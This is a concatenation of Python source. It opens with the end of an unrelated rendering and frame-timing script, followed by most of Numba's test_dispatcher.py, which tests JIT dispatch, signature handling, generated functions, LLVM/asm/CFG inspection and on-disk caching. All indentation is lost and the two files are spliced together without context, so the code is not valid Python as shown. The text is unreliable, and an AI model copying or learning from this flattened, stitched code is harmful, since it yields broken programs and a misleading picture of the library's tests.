if elapsed_time > 0.001:
to_pause_time += (float(frame_count - last_frame_count) / fps) - elapsed_time
last_frame_count = frame_count
last_time = current_time
if to_pause_time > 0.005:
time.sleep(to_pause_time)
paused_for: float = time.perf_counter() - current_time
to_pause_time -= paused_for
last_time += paused_for
else:
last_frame_count = frame_count
last_time = current_time
to_pause_time = 0 if to_pause_time < 0 else to_pause_time - (elapsed_time - 1.0 / fps)
network_processor.delete()
FileHandler().write_statistics()
window_handler.destroy()
options_gui.destroy()
compute_render_thread: threading.Thread = threading.Thread(target=compute_render, args=(1,))
compute_render_thread.daemon = True
compute_render_thread.start()
options_gui.start()
|
test_dispatcher.py
|
import errno
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import pickle
import weakref
from itertools import chain
from io import StringIO
import numpy as np
from numba import jit, generated_jit, typeof
from numba.core import types, errors, codegen
from numba import _dispatcher
from numba.core.compiler import compile_isolated
from numba.core.errors import NumbaWarning
from numba.tests.support import (TestCase, temp_directory, import_dynamic,
override_env_config, capture_cache_log,
captured_stdout)
from numba.np.numpy_support import as_dtype
from numba.core.caching import _UserWideCacheLocator
from numba.core.dispatcher import Dispatcher
from numba.tests.support import skip_parfors_unsupported, needs_lapack
import llvmlite.binding as ll
import unittest
from numba.parfors import parfor
try:
import jinja2
except ImportError:
jinja2 = None
try:
import pygments
except ImportError:
pygments = None
_is_armv7l = platform.machine() == 'armv7l'
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
def dtype_generated_usecase(a, b, dtype=None):
if isinstance(dtype, (types.misc.NoneType, types.misc.Omitted)):
out_dtype = np.result_type(*(np.dtype(ary.dtype.name)
for ary in (a, b)))
elif isinstance(dtype, (types.DType, types.NumberClass)):
out_dtype = as_dtype(dtype)
else:
raise TypeError("Unhandled Type %s" % type(dtype))
def _fn(a, b, dtype=None):
return np.ones(a.shape, dtype=out_dtype)
return _fn
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per
# https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37 # noqa: E501
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
class TestDispatcher(BaseTest):
def test_equality(self):
@jit
def foo(x):
return x
@jit
def bar(x):
return x
# Written this way to verify `==` returns a bool (gh-5838). Using
# `assertTrue(foo == foo)` or `assertEqual(foo, foo)` would defeat the
# purpose of this test.
self.assertEqual(foo == foo, True)
self.assertEqual(foo == bar, False)
self.assertEqual(foo == None, False) # noqa: E711
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
        # __module__ must match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> "
r"\(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = ("Signature mismatch: %d argument types given, but function "
"takes 2 arguments")
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
def test_serialization(self):
"""
Test serialization of Dispatcher objects
"""
@jit(nopython=True)
def foo(x):
return x + 1
self.assertEqual(foo(1), 2)
# get serialization memo
memo = Dispatcher._memo
Dispatcher._recent.clear()
memo_size = len(memo)
# pickle foo and check memo size
serialized_foo = pickle.dumps(foo)
# increases the memo size
self.assertEqual(memo_size + 1, len(memo))
# unpickle
foo_rebuilt = pickle.loads(serialized_foo)
self.assertEqual(memo_size + 1, len(memo))
self.assertIs(foo, foo_rebuilt)
# do we get the same object even if we delete all the explicit
# references?
id_orig = id(foo_rebuilt)
del foo
del foo_rebuilt
self.assertEqual(memo_size + 1, len(memo))
new_foo = pickle.loads(serialized_foo)
self.assertEqual(id_orig, id(new_foo))
# now clear the recent cache
ref = weakref.ref(new_foo)
del new_foo
Dispatcher._recent.clear()
self.assertEqual(memo_size, len(memo))
# show that deserializing creates a new object
pickle.loads(serialized_foo)
self.assertIs(ref(), None)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_array_dispatch(self):
# for context see issue #2937
def foo(a):
return np.linalg.matrix_power(a, 1)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
        # create some arrays as a Cartesian product of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# The checks must be run in this order to create the dispatch key
# sequence that causes invalid dispatch noted in #2937.
# The first two should hit the cache as they are aligned, supported
# order and under 5 dimensions. The second two should end up in the
# fallback path as they are misaligned.
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
check("F_contig_misaligned", F_contig_misaligned)
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_immutability_in_array_dispatch(self):
# RO operation in function
def foo(a):
return np.sum(a)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
        # create some arrays as a Cartesian product of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a, disable_write_bit=False):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
if disable_write_bit:
a.flags.writeable = False
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# all of these should end up in the fallback path as they have no write
# bit set
check("C_contig_aligned", C_contig_aligned, disable_write_bit=True)
check("F_contig_aligned", F_contig_aligned, disable_write_bit=True)
check("C_contig_misaligned", C_contig_misaligned,
disable_write_bit=True)
check("F_contig_misaligned", F_contig_misaligned,
disable_write_bit=True)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_high_dimension_array_dispatch(self):
def foo(a):
return np.linalg.matrix_power(a[0, 0, 0, 0, :, :], 1)
jitfoo = jit(nopython=True)(foo)
def check_properties(arr, layout, aligned):
self.assertEqual(arr.flags.aligned, aligned)
if layout == "C":
self.assertEqual(arr.flags.c_contiguous, True)
if layout == "F":
self.assertEqual(arr.flags.f_contiguous, True)
n = 729
r = 3
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
        # create some arrays as a Cartesian product of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_aligned, 'C', True)
C_contig_misaligned = tmp[1:].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_misaligned, 'C', False)
F_contig_aligned = C_contig_aligned.T
check_properties(F_contig_aligned, 'F', True)
F_contig_misaligned = C_contig_misaligned.T
check_properties(F_contig_misaligned, 'F', False)
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).\
reshape(r, r, r, r, r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# these should all hit the fallback path as the cache is only for up to
# 5 dimensions
check("F_contig_misaligned", F_contig_misaligned)
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
def test_dispatch_recompiles_for_scalars(self):
# for context #3612, essentially, compiling a lambda x:x for a
# numerically wide type (everything can be converted to a complex128)
# and then calling again with e.g. an int32 would lead to the int32
# being converted to a complex128 whereas it ought to compile an int32
# specialization.
def foo(x):
return x
# jit and compile on dispatch for 3 scalar types, expect 3 signatures
jitfoo = jit(nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 3)
expected_sigs = [(types.complex128,), (types.int32,), (types.bool_,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
# now jit with signatures so recompilation is forbidden
# expect 1 signature and type conversion
jitfoo = jit([(types.complex128,)], nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 1)
expected_sigs = [(types.complex128,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
    Same as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
def test_generated_dtype(self):
f = generated_jit(nopython=True)(dtype_generated_usecase)
a = np.ones((10,), dtype=np.float32)
b = np.ones((10,), dtype=np.float64)
self.assertEqual(f(a, b).dtype, np.float64)
self.assertEqual(f(a, b, dtype=np.dtype('int32')).dtype, np.int32)
self.assertEqual(f(a, b, dtype=np.int32).dtype, np.int32)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the llvm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper,
module_len,
module_name)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(StringIO())
# Test output
expected = str(foo.overloads[foo.signatures[0]].type_annotation)
with captured_stdout() as out:
foo.inspect_types()
assert expected in out.getvalue()
def test_inspect_types_with_signature(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.0)
# Inspect all signatures
with captured_stdout() as total:
foo.inspect_types()
# Inspect first signature
with captured_stdout() as first:
foo.inspect_types(signature=foo.signatures[0])
# Inspect second signature
with captured_stdout() as second:
foo.inspect_types(signature=foo.signatures[1])
self.assertEqual(total.getvalue(), first.getvalue() + second.getvalue())
@unittest.skipIf(jinja2 is None, "please install the 'jinja2' package")
@unittest.skipIf(pygments is None, "please install the 'pygments' package")
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_get_annotation_info(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.3)
expected = dict(chain.from_iterable(foo.get_annotation_info(i).items()
for i in foo.signatures))
result = foo.get_annotation_info()
self.assertEqual(expected, result)
def test_issue_with_array_layout_conflict(self):
"""
        This tests an issue with the dispatcher when an array that is both
        C and F contiguous is supplied as the first signature.
        The dispatcher checks for F contiguous first but the compiler checks
        for C contiguous first. This results in C contiguous code being
        inserted as an F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
cached = [old.__cached__]
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: "
"stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
class TestCache(BaseCacheUsecasesTest):
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
